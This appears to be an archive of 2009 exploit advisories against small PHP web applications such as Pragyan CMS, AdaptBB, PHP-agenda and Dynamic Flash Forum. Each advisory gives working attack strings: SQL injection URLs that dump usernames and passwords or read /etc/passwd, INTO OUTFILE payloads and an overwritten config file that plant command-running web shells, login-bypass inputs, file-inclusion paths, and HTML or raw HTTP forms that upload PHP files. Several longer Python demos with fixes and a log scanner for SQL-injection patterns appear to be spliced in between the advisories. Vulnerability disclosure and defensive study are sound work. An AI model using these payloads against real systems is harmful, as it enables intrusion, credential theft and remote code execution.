LightOpenCMS 0.1 pre-alpha Remote SQL Injection

2009-06-05 Thread Salvatore drosophila Fresta
   Salvatore drosophila Fresta   

[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms

[+] Bugs: [A] Remote SQL Injection

[+] Exploitation: Remote
[+] Date: 05 Jun 2009

[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com


***

[+] Menu

1) Bugs
2) Code
3) Fix


***

[+] Bugs


- [A] Remote SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php

This bug allows a guest to inject arbitrary SQL
statements: the id parameter is concatenated into
the query without any escaping.

...

if (isset($_GET['id'])) {
    $result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
    return mysql_fetch_assoc($result);

...


***

[+] Code


- [A] Remote SQL Injection

http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23


***

[+] Fix

No fix.


***

-- 
Salvatore Fresta aka drosophila
CWNP444351

Pragyan CMS 2.6.4 Multiple SQL Injection Vulnerabilities

2009-04-24 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Pragyan CMS
[+] Version: 2.6.4
[+] Website: http://www.pragyan.org

[+] Bugs: [A] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 22 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple SQL Injection

[-] Risk: high
[-] Requisites: magic_quotes_gpc = off/on

This web application is entirely vulnerable to
SQL injection because no variable is properly
sanitised before being used in an SQL query.
This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.


*

[+] Code


- [A] Multiple SQL Injection

http://www.site.com/path/?action=viewfile&get=-1' UNION ALL SELECT
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23


*

[+] Fix

You must sanitise all user input before it reaches a
query or, better, use prepared statements.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Multi-lingual E-Commerce System 0.2 Multiple Remote Vulnerabilities

2009-04-20 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Multi-lingual E-Commerce System
[+] Version: 0.2
[+] Website: http://sourceforge.net/projects/mlecsphp/

[+] Bugs: [A] Local File Inclusion
  [B] Information Disclosure
  [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 19 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Local File Inclusion

[-] Risk: high
[-] File affected: index.php

This bug allows a guest to include local files.
The following is the vulnerable code:

...

if (isset($_GET['lang'])) { $_SESSION['lang'] = $_GET['lang'];}

...

<?php
include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php');
?>

...


- [B] Information Disclosure

[-] Risk: medium
[-] File affected: database.inc

This file contains sensitive information such as
the username and the password used to connect to
the database. Because it has a .inc extension only,
the web server does not pass it to PHP and returns
its content as plain text.

- [C] Arbitrary File Upload

[-] Risk: medium
[-] File affected: product_image.php

No file in the admin directory checks whether the
user has admin privileges, so a guest can run every
script contained in that directory. product_image.php
contains a form that uploads files to the system but
has no check on the file extension, so a user can
upload arbitrary files.


*

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/index.php?page=../../../../../etc/passwd%00

http://www.site.com/path/index.php?lang=/../../../../../../etc/passwd%00


- [B] Information Disclosure

http://www.site.com/path/admin/inc/database.inc


- [C] Arbitrary File Upload

<html>
  <head>
<title>Multi-lingual E-Commerce System 0.2 Arbitrary File Upload
Exploit</title>
  </head>
  <body>
<form enctype="multipart/form-data"
action="http://site/path/admin/product_image.php" method="POST">
 <label for="product">Valid product ID:</label><br>
 <input type="text" name="product" value="1"><br>
 <label for="file_name">Evil file name:</label><br>
 <input type="text" name="file_name" value="/shell.php"><br>
 <label for="userfile">File:</label>
 <input name="userfile" type="file">
 <input type="hidden" name="file_path"><br><br>
 <input type="submit" value="Upload">
   </form>
  </body>
</html>


*

[+] Fix

No fix.


*

Creasito e-commerce content manager Authentication Bypass

2009-04-20 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: creasito e-commerce content manager
[+] Version: 1.3.16
[+] Website: http://creasito.bloghosteria.com

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 20 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs

This CMS is entirely vulnerable to SQL injection.
I decided to post the authentication bypass security
flaw only.

- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: admin/checkuser.php, checkuser.php

An SQL injection bug allows a guest to bypass the
authentication system. The following is the
vulnerable code:

...

$username = $_POST['username'];

...

$sql = mysql_query("SELECT * FROM amministratore WHERE
username='$username' AND password='$password' AND activated='1'");

...


*

[+] Code


- [A] Authentication Bypass

Username: -1' OR '1'='1'#
Password: foo


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Tiny Blogr 1.0.0 rc4 Authentication Bypass

2009-04-17 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Tiny Blogr
[+] Version: 1.0.0 rc4
[+] Website: http://tinyblogr.sourceforge.net

[+] Bugs: [A] Authentication Bypass

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Authentication Bypass

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: class.eport.php

This bug allows a guest to bypass the authentication
system.


*

[+] Code


- [A] Authentication Bypass

Username: admin'#
Password: foo


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Malleo 1.2.3 Local File Inclusion Vulnerability

2009-04-17 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Malleo
[+] Version: 1.2.3
[+] Website: http://www.malleo-cms.com

[+] Bugs: [A] Local File Inclusion

[+] Exploitation: Remote
[+] Date: 17 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Local File Inclusion

[-] Risk: low
[-] File affected: admin.php

This bug allows a privileged user to include local
files. I decided to publish this bug only to report
the security flaw. The following is the vulnerable
code:

...

$module = (isset($_GET['module'])) ? $_GET['module'] : $cf->config['default_module_admin'];

...

} else {
    // Refresh the activity timestamp of the founder (admin) session
    if ($cf->config['activer_digicode']) $_SESSION['digicode_TTL'] = time();
    if (file_exists($root.$module))
    {
        include_once($root.$module);

...


*

[+] Code


- [A] Local File Inclusion

http://www.site.com/path/admin.php?module=../../../../../etc/passwd
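Both inclusion paths, Malleo's $root.$module above and the Multi-lingual E-Commerce System's $include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php' from the earlier advisory, replayed as an added Python example (not code from either project) over a throw-away directory, next to a resolver that keeps the include inside the application tree. The directory layout, the file names and the "secret" file standing in for /etc/passwd are constructed for the demonstration; the NUL truncation models PHP releases before 5.3.4, where the %00 at the end of the advisories' URLs cut the path at the C level.

```python
# Added example (not Malleo or MLECS code): the two include expressions the advisories
# quote, rebuilt as path arithmetic over a throw-away directory, beside a contained resolver.
import os
import tempfile
from typing import Optional


def php_legacy_path(path: str) -> str:
    """PHP before 5.3.4 handed the path to the C runtime, which stops at the first NUL byte.
    That is what the %00 at the end of the advisories' URLs relies on."""
    return path.split("\0", 1)[0]


def malleo_include(root: str, module: str) -> str:
    """Malleo: file_exists($root.$module) then include_once($root.$module).
    file_exists() is true for any readable file, so it does not stop traversal."""
    return os.path.normpath(root + module)


def mlecs_include(include_path: str, page: str, lang: str) -> str:
    """MLECS: include($include_path.'/inc/'.$_GET['page'].'-'.$_SESSION['lang'].'.php').
    The '-<lang>.php' suffix is meant to pin the file; a NUL in page drops the suffix."""
    return os.path.normpath(php_legacy_path(include_path + "/inc/" + page + "-" + lang + ".php"))


def safe_include(base_dir: str, page: str, lang: str) -> Optional[str]:
    """Fixed: allowlist the characters, then prove the canonical path stays inside base_dir."""
    if not (page.replace("_", "").isalnum() and lang.isalpha()):
        return None                                   # rejects '/', '.', NUL and friends
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, "inc", f"{page}-{lang}.php"))
    if os.path.commonpath([base, target]) != base:    # symlink-safe containment check
        return None
    return target if os.path.isfile(target) else None


def run_demo() -> dict:
    """Constructed sample tree: app/inc/home-en.php plus a 'secret' file one level up,
    standing in for /etc/passwd. Reports which resolvers escaped the application directory."""
    with tempfile.TemporaryDirectory() as tmp:
        app = os.path.join(tmp, "app")
        os.makedirs(os.path.join(app, "inc"))
        home = os.path.join(app, "inc", "home-en.php")
        with open(home, "w") as f:
            f.write("<?php echo 'home'; ?>")
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as f:
            f.write("root:x:0:0:root:/root:/bin/sh\n")   # constructed, not a real passwd
        return {
            "malleo_escapes": malleo_include(app + "/", "../secret.txt") == secret,
            "mlecs_escapes_with_nul": mlecs_include(app, "../../secret.txt\0", "en") == secret,
            "mlecs_escapes_without_nul": mlecs_include(app, "../../secret.txt", "en") == secret,
            "safe_serves_page": safe_include(app, "home", "en") == os.path.realpath(home),
            "safe_rejects_nul": safe_include(app, "../../secret.txt\0", "en") is None,
            "safe_rejects_traversal": safe_include(app, "../../secret", "en") is None,
        }


if __name__ == "__main__":
    for check, result in run_demo().items():
        print(f"{check:28s} {result}")
```

file_exists() in Malleo's code is no defence: it is just as true for /etc/passwd. The fixed resolver refuses anything but an identifier for the page and letters for the language code, then compares the realpath of the target with the realpath of the base directory, which also catches symlinks that a plain string-prefix check would miss.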


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

PHP-agenda <= 2.2.5 Remote File Overwriting

2009-04-10 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: PHP-agenda
[+] Version: <= 2.2.5
[+] Website: http://php-agenda.sourceforge.net

[+] Bugs: [A] Remote File Overwriting

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Remote File Overwriting

[-] Risk: high
[-] File affected: install.php

This bug allows a guest to overwrite config.inc.php,
inserting PHP code into it: install.php stays reachable
after installation and writes the submitted database
settings into the configuration file without escaping them.


*

[+] Code


- [A] Remote File Overwriting

<html>
  <head>PHP-agenda <= 2.2.5 - Remote File Overwriting</head>
  <body>
<form action="http://www.site.com/path/install.php" method="post">
  <input type="text" name="dbhost" size="30" value="'; system($_GET['cmd']); echo '">
  <input type="submit" value="Exploit!">
</form>
  </body>
</html>

To execute commands:

http://www.site.com/path/config.inc.php?cmd=uname -a
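Why the dbhost value becomes code, as an added Python example (not PHP-agenda's code): render_config_naive reproduces the pattern the advisory implies, the submitted value pasted between single quotes into config.inc.php; render_config_safe emits a valid PHP single-quoted literal whatever the value contains; count_statements is a small quote-aware counter that makes the difference measurable. The line format `$name = 'value';` and the setting names are assumptions.

```python
# Added example: PHP config writer, injectable versus escaped (not PHP-agenda's code).
# Assumed: install.php writes "$name = '<value>';" lines into config.inc.php.

PHP_AGENDA_PAYLOAD = "'; system($_GET['cmd']); echo '"   # the advisory's dbhost value


def render_config_naive(settings: dict) -> str:
    """Vulnerable pattern: the value is pasted between quotes, so a quote in it ends the literal."""
    lines = ["<?php"]
    for name, value in settings.items():
        lines.append(f"${name} = '{value}';")
    return "\n".join(lines) + "\n"


def php_single_quoted(value: str) -> str:
    """Return a PHP single-quoted literal. Only two sequences are special inside '...': \\ and \'."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_config_safe(settings: dict) -> str:
    """Fixed: every value becomes exactly one literal; the setting name must be an identifier."""
    lines = ["<?php"]
    for name, value in settings.items():
        if not name.isidentifier():
            raise ValueError(f"refusing to write setting named {name!r}")
        lines.append(f"${name} = {php_single_quoted(value)};")
    return "\n".join(lines) + "\n"


def count_statements(php_source: str) -> int:
    """Count ';' outside single-quoted strings: extra statements mean a value broke out."""
    count, in_string, i = 0, False, 0
    while i < len(php_source):
        ch = php_source[i]
        if in_string:
            if ch == "\\":
                i += 1                      # skip the escaped character
            elif ch == "'":
                in_string = False
        elif ch == "'":
            in_string = True
        elif ch == ";":
            count += 1
        i += 1
    return count


if __name__ == "__main__":
    settings = {"dbhost": PHP_AGENDA_PAYLOAD, "dbname": "agenda"}
    print(render_config_naive(settings))      # system(...) is now a live statement
    print(render_config_safe(settings))       # the payload is inert string data
```

Escaping makes the payload inert, but the two conditions the advisory's fix depends on still apply: install.php must refuse to run once the application is installed, and config.inc.php should live outside the document root, since the exploit's second step is simply to request it.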


*

[+] Fix

You must delete install.php after installation.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Loggix Project 9.4.5 Blind SQL Injection

2009-04-10 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Loggix Project
[+] Version: 9.4.5
[+] Website: http://loggix.gotdns.org

[+] Bugs: [A] Blind SQL Injection

[+] Exploitation: Remote
[+] Date: 10 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: modules/comment/post.php

This bug allows a guest to execute arbitrary
queries.


*

[+] Code


- [A] Blind SQL Injection

POST /path/modules/comment/post.php HTTP/1.1\r\n
Host: site\r\n
Keep-Alive: 300\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded\r\n
Content-Length: 177\r\n
\r\n
title=title&comment=comment&user_name=user&user_pass=password&parent_key=key&refer_id=-1'
UNION ALL SELECT '<?php system($_GET['cmd']); ?>' INTO OUTFILE
'/var/www/htdocs/rce.php


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Dynamic Flash Forum 1.0 Beta Multiple Remote Vulnerabilities

2009-04-10 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Dynamic Flash Forum
[+] Version: 1.0 Beta
[+] Website: http://df2.sourceforge.net/

[+] Bugs: [A] Information Disclosure
  [B] Authentication Bypass
  [C] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Information Disclosure

[-] File affected: config.inc

This file contains sensitive information such as
the username and the password used to connect to
the database. Because it has a .inc extension only,
the web server does not pass it to PHP and returns
its content as plain text.


- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass the authentication
system and to login with administrator privileges.


- [C] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewprofile.php, viewmessage.php,
viewthreads.php

This bug allows a guest to execute arbitrary
queries.


*

[+] Code


- [A] Information Disclosure

http://www.site.com/path/config.inc


- [B] Authentication Bypass

Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password
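The login bypass above, together with the ones in Creasito (-1' OR '1'='1'#) and Tiny Blogr (admin'#), replayed offline as an added Python example (not code from any of the three projects). The table names follow the advisories; the column order of the Dynamic Flash Forum users lookup and the plain-text password comparison are assumptions that fit the UNION payload. SQLite has no MySQL-style # comment, so mysql_hash_comment_cut emulates it before each query runs.

```python
# Added example (not code from Creasito, Tiny Blogr or Dynamic Flash Forum): the three
# login checks replayed against SQLite. Table names follow the advisories; the column order
# of the Dynamic Flash Forum `users` lookup is an assumption that fits the UNION payload.
import sqlite3

CREASITO_PAYLOAD = "-1' OR '1'='1'#"
TINYBLOGR_PAYLOAD = "admin'#"
DFF_PAYLOAD = "-1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users#"


def mysql_hash_comment_cut(sql: str) -> str:
    """SQLite has no '#' comment; emulate MySQL, where a '#' outside a quoted literal
    discards the rest of the line (that is what the %23 in the advisories' URLs does)."""
    in_string = False
    for i, ch in enumerate(sql):
        if ch == "'":
            in_string = not in_string
        elif ch == "#" and not in_string:
            return sql[:i]
    return sql


def fresh_db() -> sqlite3.Connection:
    """Constructed sample data: one administrator in each table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE amministratore(username TEXT, password TEXT, activated TEXT)")
    db.execute("INSERT INTO amministratore VALUES ('admin', 's3cret', '1')")
    db.execute("CREATE TABLE users(userID INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    return db


def creasito_login(db, username: str, password: str) -> bool:
    """Vulnerable, as in checkuser.php: both inputs are pasted into the WHERE clause.
    Tiny Blogr's admin'# payload works against the same query shape."""
    sql = ("SELECT * FROM amministratore WHERE username='" + username
           + "' AND password='" + password + "' AND activated='1'")
    return db.execute(mysql_hash_comment_cut(sql)).fetchone() is not None


def dff_login(db, username: str, password: str) -> bool:
    """Vulnerable variant: only the username reaches SQL, the password is compared in code.
    A UNION can still forge the row the comparison runs against."""
    sql = "SELECT password, userID, username FROM users WHERE username='" + username + "'"
    row = db.execute(mysql_hash_comment_cut(sql)).fetchone()
    return row is not None and row[0] == password


def safe_login(db, username: str, password: str) -> bool:
    """Fixed: placeholders. The driver sends the values separately, so quotes and '#'
    in them are data, never syntax. (Hash the password in real code; plain here to match.)"""
    row = db.execute(
        "SELECT 1 FROM amministratore WHERE username=? AND password=? AND activated='1'",
        (username, password),
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    db = fresh_db()
    print("Creasito   ", creasito_login(db, CREASITO_PAYLOAD, "foo"))   # True
    print("Tiny Blogr ", creasito_login(db, TINYBLOGR_PAYLOAD, "foo"))  # True
    print("DFF union  ", dff_login(db, DFF_PAYLOAD, "password"))        # True
    print("fixed      ", safe_login(db, CREASITO_PAYLOAD, "foo"))       # False
```

The Dynamic Flash Forum case is the instructive one: the password never touches SQL, yet the UNION lets the attacker supply the row the application compares against, so the only row it ever sees has the password 'password'. Escaping the username would close these three payloads; placeholders close the class.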


- [C] Multiple SQL Injection

http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)),NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a,
password)) FROM users%23


*

[+] Fix

No fix.


*

-- 
Salvatore drosophila Fresta
CWNP444351

AdaptBB 1.0 Beta Multiple Remote Vulnerabilities

2009-04-09 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: AdaptBB
[+] Version: 1.0 Beta
[+] Website: http://sourceforge.net/projects/adaptbb/

[+] Bugs: [A] Multiple Blind SQL Injection
  [B] Multiple Dynamic Code Execution
  [C] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Multiple Blind SQL Injection

[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary SQL
queries.


- [B] Multiple Dynamic Code Execution

[-] Risk: high
[-] File affected: almost all of the files are
vulnerable

This bug allows a guest to execute arbitrary php
code.

...

if ($_GET['box']) {
    $folder = $_GET['box'];
}

...

$ddata[] = ucwords($folder);

...

eval("?>".str_replace($cdata, $ddata, stripslashes(template($view."_header")))."<?php");

...


- [C] Arbitrary File Upload

[-] Risk: high
[-] File affected: attach.php

This bug allows a registered user to upload
arbitrary files and to execute them from the
inc/attachments directory. This is possible
because the file extension is checked only on
the client side, never on the server side.


*

[+] Code


- [A] Multiple Blind SQL Injection

http://site/path/inc/attach.php?id=-1' UNION ALL SELECT '<?php
system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=profile&user=blabla&box=-1' UNION ALL
SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=messages&user=blabla&box=-1' UNION ALL
SELECT '<?php system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

http://site/path/index.php?do=edit_post&id=-1' UNION ALL SELECT '<?php
system($_GET[cmd])%3b ?>',2,3,4,5,6,7,8,9 INTO OUTFILE
'/var/www/htdocs/path/rce.php'%23

To execute commands:

http://site/path/rce.php?cmd=uname -a


- [B] Multiple Dynamic Code Execution

http://www.site.com/path/index.php?do=profile&user=blabla&box=<?php
echo "<pre>"; system('ls'); echo "</pre>"?>

http://www.site.com/path/index.php?do=messages&user=blabla&box=<?php
echo "<pre>"; system('ls'); echo "</pre>"?>


*

[+] Fix

To fix these bugs the input must be validated
properly. It is also not recommended to store the
real username and password in cookies.


*

-- 
Salvatore drosophila Fresta
CWNP444351

Joomla Component com_bookjoomlas SQL Injection Vulnerability

2009-04-06 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Joomla Component com_bookjoomlas
[+] Version: 0.1
[+] Website: http://www.alikonweb.it

[+] Bugs: [A] SQL Injection

[+] Exploitation: Remote
[+] Dork: inurl:index.php?option=com_bookjoomlas
[+] Date: 06 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] SQL Injection

[-] Security risk: low
[-] File affected: sub_commententry.php

This bug allows a privileged user to view the username
and password hash of a registered user. Like every
injectable SELECT query, it can also be manipulated
to write files on the system (INTO OUTFILE).


*

[+] Code


- [A] SQL Injection

http://www.site.com/path/index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1
UNION ALL SELECT
1,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16
FROM jos_users
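The UNION ALL SELECT, INTO OUTFILE and LOAD_FILE shapes used in this and the earlier advisories are also what a defender would look for in the web server's access log. The following is an added Python example (not code from any project on this page): it decodes the query string of each request, normalises it and reports which signatures match. The log lines are constructed for the demonstration; three of them carry payloads from this page, and one is a benign search for "union station select hotels" that a naive union.*select pattern would flag.

```python
# Added example, not code from any of the advisories' projects: a small scanner that
# URL-decodes the query string of each access-log request and flags the SQL shapes the
# advisories use. The log lines are constructed; three of them carry the advisories' payloads.
import re
from urllib.parse import unquote_plus

LOG_LINES = [
    '10.0.0.5 - - [06/Apr/2009:10:00:00 +0200] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=26 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [06/Apr/2009:10:00:07 +0200] "GET /index.php?option=com_bookjoomlas&Itemid=26&func=comment&gbid=-1%20UNION%20ALL%20SELECT%201,2,NULL,4,NULL,6,7,NULL,9,CONCAT(username,0x3a,password),11,12,13,14,15,16%20FROM%20jos_users HTTP/1.1" 200 6210',
    '10.0.0.9 - - [05/Jun/2009:14:02:11 +0200] "GET /index.php?id=-1%27%20UNION%20ALL%20SELECT%201,2,LOAD_FILE(%27/etc/passwd%27),4%23 HTTP/1.1" 200 3311',
    '10.0.0.9 - - [24/Apr/2009:09:12:40 +0200] "GET /?action=viewfile&get=-1%27%20UNION%20ALL%20SELECT%20%27evil_code%27,2,3,4,5,6,7%20INTO%20OUTFILE%20%27/path/evil.php%27%23 HTTP/1.1" 200 220',
    '10.0.0.12 - - [24/Apr/2009:09:13:01 +0200] "GET /?action=viewfile&get=12 HTTP/1.1" 200 8192',
    '10.0.0.12 - - [24/Apr/2009:09:13:05 +0200] "GET /search.php?q=union+station+select+hotels HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/')

# Each pattern names one shape seen in the advisories. Word boundaries and the mandatory
# whitespace between UNION [ALL] and SELECT keep "union station select" from matching.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b"),
    "load_file": re.compile(r"\bload_file\s*\("),
    "trailing_hash_comment": re.compile(r"#\s*$"),
}


def normalise_query(target: str) -> str:
    """Decode twice (catches %2527-style double encoding; a literal '+' also becomes a
    space, acceptable for detection), lower-case, collapse whitespace."""
    query = target.partition("?")[2]
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).strip().lower()


def scan_line(line: str) -> list:
    """Names of the signatures the request matches (empty for a clean line)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = normalise_query(m.group("target"))
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]


def scan_log(lines) -> list:
    """(line index, matched signature names) for every line that matched something."""
    hits = []
    for i, line in enumerate(lines):
        names = scan_line(line)
        if names:
            hits.append((i, names))
    return hits


if __name__ == "__main__":
    for index, names in scan_log(LOG_LINES):
        print(index, ", ".join(names))
```

Decoding twice catches double-encoded quotes (%2527), and the word boundaries with mandatory whitespace between UNION [ALL] and SELECT keep ordinary English out of the alerts. A trailing # is listed separately because on its own it is weak evidence; it is the combination with UNION, LOAD_FILE or INTO OUTFILE that should page someone.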


*

[+] Fix

No fix.


*

--
Salvatore drosophila Fresta
CWNP444351

Family Connections 1.8.2 Arbitrary File Upload

2009-04-03 Thread Salvatore drosophila Fresta
***   Salvatore drosophila Fresta   ***

[+] Application: Family Connection
[+] Version: <= 1.8.2
[+] Website: http://www.familycms.com

[+] Bugs: [A] Arbitrary File Upload

[+] Exploitation: Remote
[+] Date: 3 Apr 2009

[+] Discovered by: Salvatore drosophila Fresta
[+] Author: Salvatore drosophila Fresta
[+] Contact: e-mail: drosophila...@gmail.com


*

[+] Menu

1) Bugs
2) Code
3) Fix


*

[+] Bugs


- [A] Arbitrary File Upload

[-] Files affected: documents.php inc/documents_class.php

This bug allows a registered user to upload arbitrary
files to the system. This is possible because the file
extension is never checked; the only control is on the
Content-Type header, which the client chooses and can
change easily.

...

if (isset($_POST['submitadd'])) {
    $doc = $_FILES['doc']['name'];
    $desc = addslashes($_POST['desc']);
    if ($docs->uploadDocument($_FILES['doc']['type'],
        $_FILES['doc']['name'], $_FILES['doc']['tmp_name'])) {

...

function uploadDocument ($filetype, $filename, $filetmpname) {
    global $LANG;
    $known_photo_types = array('application/msword' => 'doc',
        'text/plain' => 'txt', 'application/excel' => 'xsl',
        'application/vnd.ms-excel' => 'xsl', 'application/x-msexcel' => 'xsl',
        'application/x-compressed' => 'zip',
        'application/x-zip-compressed' => 'zip', 'application/zip' => 'zip',
        'multipart/x-zip' => 'zip', 'application/rtf' => 'rtf',
        'application/x-rtf' => 'rtf', 'text/richtext' => 'rtf',
        'application/mspowerpoint' => 'ppt', 'application/powerpoint' => 'ppt',
        'application/vnd.ms-powerpoint' => 'ppt',
        'application/x-mspowerpoint' => 'ppt', 'application/x-excel' => 'xsl',
        'application/pdf' => 'pdf');
    if (!array_key_exists($filetype, $known_photo_types)) {
        echo "<p class=\"error-alert\">".$LANG['err_not_doc1']." $filetype "
            .$LANG['err_not_doc2']."<br/>".$LANG['err_not_doc3']."</p>";
        return false;
    } else {
        copy($filetmpname, "gallery/documents/$filename");
        return true;
    }
}

...


*

[+] Code


- [A] Arbitrary File Upload

The following is an example of a malicious request:

POST /fcms/upload.php HTTP/1.1\r\n
Host: localhost\r\n
Cookie: PHPSESSID=50fb1135c2da7f60bb66eb35cbc6ab97\r\n
Content-type: multipart/form-data, boundary=AaB03x\r\n
Content-Length: 295\r\n\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="doc"; filename="file.php"\r\n
Content-Type: text/plain\r\n
\r\n
<?php echo "This is not a text file"?>\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="desc"\r\n
\r\n
description\r\n
--AaB03x\r\n
Content-Disposition: form-data; name="submitadd"\r\n
\r\n
Submit\r\n
--AaB03x--\r\n
